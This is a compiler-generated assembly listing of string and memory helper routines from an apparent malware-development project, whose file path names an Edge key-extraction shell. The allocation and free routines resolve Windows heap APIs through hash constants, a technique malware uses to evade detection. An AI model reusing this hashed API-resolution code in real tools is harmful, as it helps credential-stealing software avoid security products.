; Listing generated by Microsoft (R) Optimizing Compiler Version 19.50.35730.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	?LowerStringA@@YA_NPEAD@Z			; LowerStringA
PUBLIC	?LowerStringW@@YA_NPEA_W@Z			; LowerStringW
PUBLIC	?UpperStringA@@YA_NPEAD@Z			; UpperStringA
PUBLIC	?UpperStringW@@YA_NPEA_W@Z			; UpperStringW
PUBLIC	?CompareStringA@@YA_NPEBD0@Z			; CompareStringA
PUBLIC	?CompareStringW@@YA_NPEB_W0@Z			; CompareStringW
PUBLIC	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z		; FindPatternA
PUBLIC	?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z		; FindPatternW
PUBLIC	?CopyStringA@@YA_NPEBDPEAD_K@Z			; CopyStringA
PUBLIC	?CopyStringW@@YA_NPEB_WPEA_W_K@Z		; CopyStringW
PUBLIC	?StringAToW@@YA_NPEADPEA_W@Z			; StringAToW
PUBLIC	?StringWToA@@YA_NPEA_WPEAD@Z			; StringWToA
PUBLIC	?StrLen@@YA_KPEAD@Z				; StrLen
PUBLIC	?CopyMemoryV@@YA_NPEBXPEAX_K@Z			; CopyMemoryV
PUBLIC	?AllocMemory@@YA_N_KPEAPEAX@Z			; AllocMemory
PUBLIC	?FreeMemory@@YA_NPEAX@Z				; FreeMemory
EXTRN	??0ApiResolve@@QEAA@XZ:PROC			; ApiResolve::ApiResolve
EXTRN	??1ApiResolve@@QEAA@XZ:PROC			; ApiResolve::~ApiResolve
EXTRN	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z:PROC ; ApiResolve::GetModuleBaseAddress
EXTRN	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z:PROC	; ApiResolve::GetApiAddress
; Function compile flags: /Odtp
_TEXT	SEGMENT
$T1 = 32
$T2 = 33
$T3 = 34
$T4 = 35
$T5 = 36
$T6 = 37
apiResolve$ = 40
lpKernel32$ = 48
pGetProcessHeap$ = 56
pHeapFree$ = 64
hHeap$ = 72
hashKernel32$ = 80
hashGetProcessHeap$ = 84
hashHeapFree$ = 88
tv88 = 96
lpMemory$ = 128
?FreeMemory@@YA_NPEAX@Z PROC				; FreeMemory
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 243
$LN8:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 120				; 00000078H
; Line 250
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 251
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 252
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 253
	cmp	QWORD PTR lpKernel32$[rsp], 0
	jne	SHORT $LN2@FreeMemory
; Line 254
	mov	BYTE PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T1[rsp]
	jmp	$LN1@FreeMemory
$LN2@FreeMemory:
; Line 257
	mov	DWORD PTR hashGetProcessHeap$[rsp], -329891580 ; ec564104H
; Line 258
	mov	r8d, -329891580				; ec564104H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetProcessHeap$[rsp], rax
; Line 259
	cmp	QWORD PTR pGetProcessHeap$[rsp], 0
	jne	SHORT $LN3@FreeMemory
; Line 260
	mov	BYTE PTR $T2[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T2[rsp]
	jmp	$LN1@FreeMemory
$LN3@FreeMemory:
; Line 263
	mov	DWORD PTR hashHeapFree$[rsp], -963999842 ; c68a879eH
; Line 264
	mov	r8d, -963999842				; c68a879eH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pHeapFree$[rsp], rax
; Line 265
	cmp	QWORD PTR pHeapFree$[rsp], 0
	jne	SHORT $LN4@FreeMemory
; Line 266
	mov	BYTE PTR $T3[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T3[rsp]
	jmp	SHORT $LN1@FreeMemory
$LN4@FreeMemory:
; Line 269
	call	QWORD PTR pGetProcessHeap$[rsp]
	mov	QWORD PTR hHeap$[rsp], rax
; Line 270
	cmp	QWORD PTR hHeap$[rsp], 0
	jne	SHORT $LN5@FreeMemory
; Line 271
	mov	BYTE PTR $T4[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T4[rsp]
	jmp	SHORT $LN1@FreeMemory
$LN5@FreeMemory:
; Line 274
	mov	rax, QWORD PTR pHeapFree$[rsp]
	mov	QWORD PTR tv88[rsp], rax
	mov	r8, QWORD PTR lpMemory$[rsp]
	xor	edx, edx
	mov	rcx, QWORD PTR hHeap$[rsp]
	call	QWORD PTR tv88[rsp]
	test	eax, eax
	jne	SHORT $LN6@FreeMemory
; Line 275
	mov	BYTE PTR $T5[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T5[rsp]
	jmp	SHORT $LN1@FreeMemory
$LN6@FreeMemory:
; Line 278
	mov	BYTE PTR $T6[rsp], 1
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T6[rsp]
$LN1@FreeMemory:
; Line 279
	add	rsp, 120				; 00000078H
	ret	0
?FreeMemory@@YA_NPEAX@Z ENDP				; FreeMemory
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
$T1 = 32
$T2 = 33
$T3 = 34
$T4 = 35
apiResolver$ = 40
lpKernel32$ = 48
pGetProcessHeap$ = 56
hHeap$ = 64
hashNewDll$ = 72
hashNewApi$ = 76
hashKernel32$ = 80
hashGetProcessHeap$ = 84
hashHeapAlloc$ = 88
pHeapAlloc$ = 96
tv87 = 104
size$ = 128
result$ = 136
?AllocMemory@@YA_N_KPEAPEAX@Z PROC			; AllocMemory
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 204
$LN6:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 120				; 00000078H
; Line 215
	mov	DWORD PTR hashNewDll$[rsp], 0
; Line 216
	mov	DWORD PTR hashNewApi$[rsp], 0
; Line 218
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 219
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 220
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 221
	cmp	QWORD PTR lpKernel32$[rsp], 0
	jne	SHORT $LN2@AllocMemor
; Line 222
	mov	BYTE PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T1[rsp]
	jmp	$LN1@AllocMemor
$LN2@AllocMemor:
; Line 225
	mov	DWORD PTR hashGetProcessHeap$[rsp], -329891580 ; ec564104H
; Line 226
	mov	r8d, -329891580				; ec564104H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetProcessHeap$[rsp], rax
; Line 227
	cmp	QWORD PTR pGetProcessHeap$[rsp], 0
	jne	SHORT $LN3@AllocMemor
; Line 228
	mov	BYTE PTR $T2[rsp], 0
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T2[rsp]
	jmp	$LN1@AllocMemor
$LN3@AllocMemor:
; Line 231
	mov	DWORD PTR hashHeapAlloc$[rsp], 1026283748 ; 3d2bd8e4H
; Line 232
	mov	r8d, 1026283748				; 3d2bd8e4H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pHeapAlloc$[rsp], rax
; Line 234
	call	QWORD PTR pGetProcessHeap$[rsp]
	mov	QWORD PTR hHeap$[rsp], rax
; Line 235
	cmp	QWORD PTR hHeap$[rsp], 0
	jne	SHORT $LN4@AllocMemor
; Line 236
	mov	BYTE PTR $T3[rsp], 0
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T3[rsp]
	jmp	SHORT $LN1@AllocMemor
$LN4@AllocMemor:
; Line 239
	mov	rax, QWORD PTR pHeapAlloc$[rsp]
	mov	QWORD PTR tv87[rsp], rax
	mov	r8, QWORD PTR size$[rsp]
	mov	edx, 8
	mov	rcx, QWORD PTR hHeap$[rsp]
	call	QWORD PTR tv87[rsp]
	mov	rcx, QWORD PTR result$[rsp]
	mov	QWORD PTR [rcx], rax
; Line 240
	mov	BYTE PTR $T4[rsp], 1
	lea	rcx, QWORD PTR apiResolver$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T4[rsp]
$LN1@AllocMemor:
; Line 241
	add	rsp, 120				; 00000078H
	ret	0
?AllocMemory@@YA_N_KPEAPEAX@Z ENDP			; AllocMemory
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
d$ = 8
s$ = 16
src$ = 48
dst$ = 56
size$ = 64
?CopyMemoryV@@YA_NPEBXPEAX_K@Z PROC			; CopyMemoryV
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 193
$LN6:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 40					; 00000028H
; Line 194
	mov	rax, QWORD PTR dst$[rsp]
	mov	QWORD PTR d$[rsp], rax
; Line 195
	mov	rax, QWORD PTR src$[rsp]
	mov	QWORD PTR s$[rsp], rax
; Line 197
	mov	QWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@CopyMemory
$LN2@CopyMemory:
	mov	rax, QWORD PTR i$1[rsp]
	inc	rax
	mov	QWORD PTR i$1[rsp], rax
$LN4@CopyMemory:
	mov	rax, QWORD PTR size$[rsp]
	cmp	QWORD PTR i$1[rsp], rax
	jae	SHORT $LN3@CopyMemory
; Line 198
	mov	rax, QWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR d$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	rcx, QWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s$[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	movzx	ecx, BYTE PTR [rcx]
	mov	BYTE PTR [rax], cl
; Line 199
	jmp	SHORT $LN2@CopyMemory
$LN3@CopyMemory:
; Line 201
	mov	al, 1
; Line 202
	add	rsp, 40					; 00000028H
	ret	0
?CopyMemoryV@@YA_NPEBXPEAX_K@Z ENDP			; CopyMemoryV
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
size$ = 0
s$ = 32
?StrLen@@YA_KPEAD@Z PROC				; StrLen
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 180
$LN6:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 181
	mov	QWORD PTR size$[rsp], 0
$LN2@StrLen:
; Line 182
	xor	eax, eax
	cmp	eax, 1
	je	SHORT $LN3@StrLen
; Line 183
	mov	rax, QWORD PTR size$[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	add	rcx, rax
	mov	rax, rcx
	movsx	eax, BYTE PTR [rax]
	test	eax, eax
	jne	SHORT $LN4@StrLen
; Line 184
	jmp	SHORT $LN3@StrLen
$LN4@StrLen:
; Line 187
	mov	rax, QWORD PTR size$[rsp]
	inc	rax
	mov	QWORD PTR size$[rsp], rax
; Line 188
	jmp	SHORT $LN2@StrLen
$LN3@StrLen:
; Line 190
	mov	rax, QWORD PTR size$[rsp]
; Line 191
	add	rsp, 24
	ret	0
?StrLen@@YA_KPEAD@Z ENDP				; StrLen
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
src$ = 32
dst$ = 40
?StringWToA@@YA_NPEA_WPEAD@Z PROC			; StringWToA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 149
$LN7:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 150
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@StringWToA
$LN2@StringWToA:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@StringWToA:
; Line 151
	movsxd	rax, DWORD PTR i$1[rsp]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR dst$[rsp]
	mov	r8, QWORD PTR src$[rsp]
	movzx	eax, BYTE PTR [r8+rax*2]
	mov	BYTE PTR [rdx+rcx], al
; Line 152
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR src$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN5@StringWToA
; Line 153
	jmp	SHORT $LN3@StringWToA
$LN5@StringWToA:
; Line 155
	jmp	SHORT $LN2@StringWToA
$LN3@StringWToA:
; Line 157
	mov	al, 1
; Line 158
	add	rsp, 24
	ret	0
?StringWToA@@YA_NPEA_WPEAD@Z ENDP			; StringWToA
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
src$ = 32
dst$ = 40
?StringAToW@@YA_NPEADPEA_W@Z PROC			; StringAToW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 137
$LN7:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 138
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@StringAToW
$LN2@StringAToW:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@StringAToW:
; Line 139
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR src$[rsp]
	movsx	ax, BYTE PTR [rcx+rax]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR dst$[rsp]
	mov	WORD PTR [rdx+rcx*2], ax
; Line 140
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	cdqe
	xor	ecx, ecx
	mov	rdx, QWORD PTR dst$[rsp]
	mov	WORD PTR [rdx+rax*2], cx
; Line 141
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR src$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@StringAToW
; Line 142
	jmp	SHORT $LN3@StringAToW
$LN5@StringAToW:
; Line 144
	jmp	SHORT $LN2@StringAToW
$LN3@StringAToW:
; Line 146
	mov	al, 1
; Line 147
	add	rsp, 24
	ret	0
?StringAToW@@YA_NPEADPEA_W@Z ENDP			; StringAToW
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
src$ = 32
dst$ = 40
sizeDst$ = 48
?CopyStringW@@YA_NPEB_WPEA_W_K@Z PROC			; CopyStringW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 170
$LN7:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 171
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@CopyString
$LN2@CopyString:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@CopyString:
	movsxd	rax, DWORD PTR i$1[rsp]
	cmp	rax, QWORD PTR sizeDst$[rsp]
	jae	SHORT $LN3@CopyString
; Line 172
	movsxd	rax, DWORD PTR i$1[rsp]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR dst$[rsp]
	mov	r8, QWORD PTR src$[rsp]
	movzx	eax, WORD PTR [r8+rax*2]
	mov	WORD PTR [rdx+rcx*2], ax
; Line 173
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR src$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN5@CopyString
; Line 174
	mov	al, 1
	jmp	SHORT $LN1@CopyString
$LN5@CopyString:
; Line 176
	jmp	SHORT $LN2@CopyString
$LN3@CopyString:
; Line 177
	xor	al, al
$LN1@CopyString:
; Line 178
	add	rsp, 24
	ret	0
?CopyStringW@@YA_NPEB_WPEA_W_K@Z ENDP			; CopyStringW
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
src$ = 32
dst$ = 40
sizeDst$ = 48
?CopyStringA@@YA_NPEBDPEAD_K@Z PROC			; CopyStringA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 160
$LN7:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 161
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@CopyString
$LN2@CopyString:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@CopyString:
	movsxd	rax, DWORD PTR i$1[rsp]
	cmp	rax, QWORD PTR sizeDst$[rsp]
	jae	SHORT $LN3@CopyString
; Line 162
	movsxd	rax, DWORD PTR i$1[rsp]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR dst$[rsp]
	mov	r8, QWORD PTR src$[rsp]
	movzx	eax, BYTE PTR [r8+rax]
	mov	BYTE PTR [rdx+rcx], al
; Line 163
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR src$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN5@CopyString
; Line 164
	mov	al, 1
	jmp	SHORT $LN1@CopyString
$LN5@CopyString:
; Line 166
	jmp	SHORT $LN2@CopyString
$LN3@CopyString:
; Line 167
	xor	al, al
$LN1@CopyString:
; Line 168
	add	rsp, 24
	ret	0
?CopyStringA@@YA_NPEBDPEAD_K@Z ENDP			; CopyStringA
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
j$1 = 0
i$2 = 4
p$3 = 8
s$ = 32
pattern$ = 40
sizePattern$ = 48
result$ = 56
?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z PROC		; FindPatternW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 112
$LN14:
	mov	QWORD PTR [rsp+32], r9
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 113
	mov	DWORD PTR i$2[rsp], 0
	jmp	SHORT $LN4@FindPatter
$LN2@FindPatter:
	mov	eax, DWORD PTR i$2[rsp]
	inc	eax
	mov	DWORD PTR i$2[rsp], eax
$LN4@FindPatter:
; Line 114
	movsxd	rax, DWORD PTR i$2[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN8@FindPatter
; Line 115
	xor	al, al
	jmp	$LN1@FindPatter
$LN8@FindPatter:
; Line 117
	movsxd	rax, DWORD PTR i$2[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	lea	rax, QWORD PTR [rcx+rax*2]
	mov	QWORD PTR p$3[rsp], rax
; Line 118
	mov	DWORD PTR j$1[rsp], 0
	jmp	SHORT $LN7@FindPatter
$LN5@FindPatter:
	mov	eax, DWORD PTR j$1[rsp]
	inc	eax
	mov	DWORD PTR j$1[rsp], eax
$LN7@FindPatter:
	movsxd	rax, DWORD PTR j$1[rsp]
	cmp	rax, QWORD PTR sizePattern$[rsp]
	jae	SHORT $LN6@FindPatter
; Line 119
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR pattern$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN9@FindPatter
; Line 120
	mov	rax, QWORD PTR result$[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	mov	QWORD PTR [rax], rcx
; Line 121
	mov	al, 1
	jmp	SHORT $LN1@FindPatter
$LN9@FindPatter:
; Line 123
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	movsxd	rcx, DWORD PTR j$1[rsp]
	mov	rdx, QWORD PTR pattern$[rsp]
	movzx	ecx, WORD PTR [rdx+rcx*2]
	cmp	eax, ecx
	je	SHORT $LN10@FindPatter
; Line 124
	jmp	SHORT $LN6@FindPatter
$LN10@FindPatter:
; Line 126
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN11@FindPatter
; Line 127
	xor	al, al
	jmp	SHORT $LN1@FindPatter
$LN11@FindPatter:
; Line 129
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR sizePattern$[rsp]
	dec	rcx
	cmp	rax, rcx
	jne	SHORT $LN12@FindPatter
; Line 130
	mov	rax, QWORD PTR result$[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	mov	QWORD PTR [rax], rcx
; Line 131
	mov	al, 1
	jmp	SHORT $LN1@FindPatter
$LN12@FindPatter:
; Line 133
	jmp	$LN5@FindPatter
$LN6@FindPatter:
; Line 134
	jmp	$LN2@FindPatter
$LN1@FindPatter:
; Line 135
	add	rsp, 24
	ret	0
?FindPatternW@@YA_NPEB_W0_KPEAPEA_W@Z ENDP		; FindPatternW
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
j$1 = 0
i$2 = 4
p$3 = 8
s$ = 32
pattern$ = 40
sizePattern$ = 48
result$ = 56
?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z PROC		; FindPatternA
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 83
$LN14:
	mov	QWORD PTR [rsp+32], r9
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 84
	mov	DWORD PTR i$2[rsp], 0
	jmp	SHORT $LN4@FindPatter
$LN2@FindPatter:
	mov	eax, DWORD PTR i$2[rsp]
	inc	eax
	mov	DWORD PTR i$2[rsp], eax
$LN4@FindPatter:
; Line 85
	movsxd	rax, DWORD PTR i$2[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN8@FindPatter
; Line 86
	xor	al, al
	jmp	$LN1@FindPatter
$LN8@FindPatter:
; Line 89
	movsxd	rax, DWORD PTR i$2[rsp]
	mov	rcx, QWORD PTR s$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR p$3[rsp], rax
; Line 90
	mov	DWORD PTR j$1[rsp], 0
	jmp	SHORT $LN7@FindPatter
$LN5@FindPatter:
	mov	eax, DWORD PTR j$1[rsp]
	inc	eax
	mov	DWORD PTR j$1[rsp], eax
$LN7@FindPatter:
	movsxd	rax, DWORD PTR j$1[rsp]
	cmp	rax, QWORD PTR sizePattern$[rsp]
	jae	SHORT $LN6@FindPatter
; Line 91
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR pattern$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN9@FindPatter
; Line 92
	mov	rax, QWORD PTR result$[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	mov	QWORD PTR [rax], rcx
; Line 93
	mov	al, 1
	jmp	SHORT $LN1@FindPatter
$LN9@FindPatter:
; Line 96
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	movsxd	rcx, DWORD PTR j$1[rsp]
	mov	rdx, QWORD PTR pattern$[rsp]
	movsx	ecx, BYTE PTR [rdx+rcx]
	cmp	eax, ecx
	je	SHORT $LN10@FindPatter
; Line 97
	jmp	SHORT $LN6@FindPatter
$LN10@FindPatter:
; Line 100
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	test	eax, eax
	jne	SHORT $LN11@FindPatter
; Line 101
	xor	al, al
	jmp	SHORT $LN1@FindPatter
$LN11@FindPatter:
; Line 104
	movsxd	rax, DWORD PTR j$1[rsp]
	mov	rcx, QWORD PTR sizePattern$[rsp]
	dec	rcx
	cmp	rax, rcx
	jne	SHORT $LN12@FindPatter
; Line 105
	mov	rax, QWORD PTR result$[rsp]
	mov	rcx, QWORD PTR p$3[rsp]
	mov	QWORD PTR [rax], rcx
; Line 106
	mov	al, 1
	jmp	SHORT $LN1@FindPatter
$LN12@FindPatter:
; Line 108
	jmp	$LN5@FindPatter
$LN6@FindPatter:
; Line 109
	jmp	$LN2@FindPatter
$LN1@FindPatter:
; Line 110
	add	rsp, 24
	ret	0
?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z ENDP		; FindPatternA
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
i$1 = 0
s1$ = 32
s2$ = 40
?CompareStringW@@YA_NPEB_W0@Z PROC			; CompareStringW
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\CRT.cpp
; Line 69
$LN10:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 24
; Line 70
	cmp	QWORD PTR s1$[rsp], 0
	je	SHORT $LN6@CompareStr
	cmp	QWORD PTR s2$[rsp], 0
	jne	SHORT $LN5@CompareStr
$LN6@CompareStr:
; Line 71
	xor	al, al
	jmp	SHORT $LN1@CompareStr
$LN5@CompareStr:
; Line 73
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@CompareStr
$LN2@CompareStr:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@CompareStr:
; Line 74
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s1$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN7@CompareStr
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s2$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	test	eax, eax
	jne	SHORT $LN7@CompareStr
; Line 75
	mov	al, 1
	jmp	SHORT $LN1@CompareStr
$LN7@CompareStr:
; Line 77
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR s1$[rsp]
	movzx	eax, WORD PTR [rcx+rax*2]
	movsxd	rcx, DWORD PTR i$1[rsp]
	mov	rdx, QWORD PTR s2$[rsp]
	movzx	ecx, WORD PTR [rdx+rcx*2]
	cmp	eax, ecx
	je	SHORT $LN8@CompareStr
; Line 78
	xor	al, al
	jmp	SHORT $LN1@CompareStr
$LN8@CompareStr:
; Line 80
	jmp	SHORT $LN2@CompareStr
$LN1@CompareStr:
; Line 81
	add	rsp, 24
	ret	0
?CompareStringW@@YA_NPEB_W0@Z ENDP			; CompareStringW
